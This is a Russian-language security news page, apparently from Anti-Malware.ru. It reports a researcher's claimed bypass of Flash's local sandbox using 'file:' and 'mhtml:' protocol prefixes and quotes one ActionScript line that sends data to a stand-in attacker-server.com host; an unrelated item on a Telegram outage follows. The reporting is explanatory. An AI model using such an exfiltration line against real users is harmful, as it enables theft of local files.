Простой способ обхода «песочницы» Flash

Был найден специалистом в области безопасности. Он утверждает, что даже если файл был запущен локально, то для злоумышленника отправить его на удаленный сервер не составит труда.

Как известно, компания Adobe в своей продукции предусмотрела некоторые меры по защите доступа к сети. Одной из мер является встроенная в приложение «песочница», посредством которой осуществляется контроль доступа к сети через черный список. В этот список включены заголовки протоколов, например HTTP и HTTPS.

Однако, исследователь в области безопасности Билли Риос, утверждает, что можно отправлять файлы на сервер, используя в заголовках запись «file:», но в этом случае данные будут гулять по локальной сети. А для отправки данных на удаленный сервер, по его мнению, вполне подойдет заголовок – mhtml.

Этот заголовок по умолчанию поддерживается в операционных системах семейства Windows, и поэтому данные могут быть отправлены при помощи ActionScript команды: «getURL(‘mhtml:http://attacker-server.com/stolen-data-here‘, ”);». Стоит заметить, что для подтверждения своей гипотезы специалист не привел никаких демонстрационных материалов.

Конечно, удивительно, что настолько легко и просто можно обойти одну из «песочниц»
Flash. Однако, это открытие не представляет серьезной опасности, поскольку вряд ли пользователи будут специально скачивать себе на компьютер SWF файл, чтобы просмотреть через плеер. Обычно, такие файлы просматриваются в обозревателе, где предусмотрен иной набор правил.

Anti-Malware Яндекс ДзенПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

Telegram опять в дауне, на этот раз, похоже, масштабно

Сегодня утром, 27 февраля, пользователи Telegram обнаружили, что мессенджер недоступен. В основном сбоит веб-версия, у некоторых — также приложения.

По данным DownDetector, проблемы начались в 10:35, а в районе полудня число жалоб на отсутствие связи резко возросло.

 

Сбои наблюдаются на большей части России; в соцсетях больше прочих жалуются москвичи и петербуржцы. У некоторых счастливчиков зависла только загрузка картинок. Судя по комментариям, в некоторых регионах пользователям удается решить проблему с помощью VPN.

К часу дня в информационном канале Telegram появилось сообщение, подтверждающее проблемы с доступом на западе России и в Сибири, притом как у провайдеров, так и у операторов сотовой связи. Кстати, графика к этому посту сейчас тоже не грузится.

Причины пока не известны. В прошлом году популярный мессенджер многократно сбоил в России, и не только; по чьей вине — можно было только гадать.

Anti-Malware Яндекс ДзенПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru